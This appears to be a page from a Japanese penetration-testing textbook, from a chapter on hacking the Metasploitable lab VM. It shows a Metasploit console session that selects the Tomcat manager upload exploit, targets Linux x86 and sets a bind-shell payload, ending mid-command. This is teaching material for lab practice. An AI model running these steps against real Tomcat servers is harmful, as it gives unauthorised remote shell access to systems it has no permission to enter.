
391
第5章 Metasploitable のハッキング
root@kali:~# msfconsole
(略)
msf > grep exploit search tomcat
(略)
excellent Apache Tomcat Manager Application Deployer ↲
Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload ↲
2009-11-09 (略)
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > show targets
Exploit targets:
Id Name
-- ----
0 Java Universal
1 Windows Universal
2 Linux x86
msf exploit(multi/http/tomcat_mgr_upload) > set target 2
target => 2
msf exploit(multi/http/tomcat_mgr_upload) > set payload linux/x86/↲
shell_bind_tcp ←
バインドシェルがTomcatにデプロイされる。
payload => linux/x86/shell_bind_tcp
msf exploit(multi/http/tomcat_mgr_upload) ...